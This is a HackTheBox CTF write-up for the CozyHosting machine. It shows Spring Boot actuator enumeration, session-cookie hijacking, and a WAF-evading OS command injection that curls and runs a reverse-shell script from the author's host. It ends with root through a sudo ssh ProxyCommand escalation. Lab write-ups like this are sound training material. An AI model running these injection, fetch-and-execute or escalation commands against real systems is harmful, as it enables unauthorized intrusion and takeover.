HackTheBox - CozyHosting writeup

Published on by logoseq

HackTheBox CozyHosting machine image cover.
Made with ❤️ by M3riart3



In this walkthrough we will learn about Spring boot framework and some common endpoints that we can find with a wordlist. Also we'll learn how to do a encoded OS command injection and get a reverse shell. Also you'll learn how to do a brute force attack to get credentials and GTFOBins for priviledged escalation.


Following my routine, I performed an nmap scan and observed the following open ports: 22, 80
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3
80/tcp open http nginx 1.18.0
_http-title: Did not follow redirect to http://cozyhosting.htb

I added cozyhosting.htb to my /etc/hosts file and then searched for a subdomain but nothing was found, while feroxbuster found:


I successfully discovered the admin's password, which turned out to be manchesterunited. However, upon attempting to log in, I encountered a 401 Unauthorized error.

hydra found admin's password which is manchesterunited image of spring boot error page

I initiated an investigation by conducting a Google search for the error title, which led me to the realization that it is the default error page of the Spring Boot framework. Furthering my research, I performed a search for a Spring Boot specific wordlist on GitHub. The culmination of these efforts resulted from utilizing Feroxbuster's content discovery feature.

    http://cozyhosting.htb/actuator/env (filename: cloudhosting-0.0.1.jar)
    http://cozyhosting.htb/actuator/mappings (Tomcat WebSocket JSR356)
    http://cozyhosting.htb/actuator/sessions (json session cookie)


The /actuator/sessions endpoint in the Spring Boot application offers insights into active user sessions. During my inspection of this page, I observed a few unauthorized cookies and identified a user named kanderson. Capitalizing on this discovery, I acquired 'kanderson's' cookie and successfully gained administrative access, thus enabling access to the '/admin' page.

spring boot active session page where we can see user's cookie

This suggests that an operating system command is executed when sending a POST request to the '/executessh' action. It led me to consider the possibility of an OS command injection. Indeed, I successfully executed the 'id' command via the 'username' parameter, yielding the result: uid=1001(app)

/admin page where we can input hostname and username, there is the result of a command injection into username parameter

After a series of trial and error attempts, I discovered that using individual flags such as -d didn't yield the desired results, as they seemed to isolate commands from one another. Consequently, I opted to develop a Bash script named "revS.sh" and subsequently uploaded it to the target machine.

    echo base64EncodedPayload | base64 -d | bash
    chmod +x revS.sh
    // Then I saved and named it as revS.sh
    python3 -m http.server 8888
To get the payload from my machine I used the following OS command injection: host=;$(curl{IFS}$MyIP:8888/revS.sh|bash)
{IFS} I used this because there was a WAF that blocked whitespaces
revS.sh it's the payload I created earlier


System Enumeration:

I retrieved the file /app/cloudhosting-0.0.1.jar and then employed the unzip command for extraction. This decision was based on information I stumbled upon within a random forum discussion concerning .jar files.

"There's nothing magical about a .jar file. It's just a .zip file with a different extension."

set up a python3 http server on the machine and got the source code of /app/cloudhosting-0.0.1.jar

I discovered that the server was running a PostgreSQL database on the default port 5432, and I obtained the credentials for the "postgres" user. This valuable information was located within the '/BOOT-INF/classes/application.properties' file.

postgresql credentials from /app/cloudhosting-0.0.1.jar file


After some time I remembered that at the beginning I found admin's password but was useless, that's why I tried it to log in as josh and it worked!

System Exploitation:

I run:

    josh@cozyhosting:~$ sudo -l
    User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *            
GTFOBins showed me how to exploit the /usr/bin/ssh command, it was pretty simple. I ran this command:

    sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
It worked! I become root and got the flag.

Writeup learnings:

This lab provided a valuable learning experience, and I'm delighted with the knowledge I gained throughout the process. I acquired insights into the clever utilization of {IFS} (Internal Field Separator) for word splitting, enabling me to bypass a basic Web Application Firewall (WAF). Additionally, I deepened my understanding of OS command injection and its exploitation. I became proficient in using psql and unzip to retrieve the source code from a .jar file.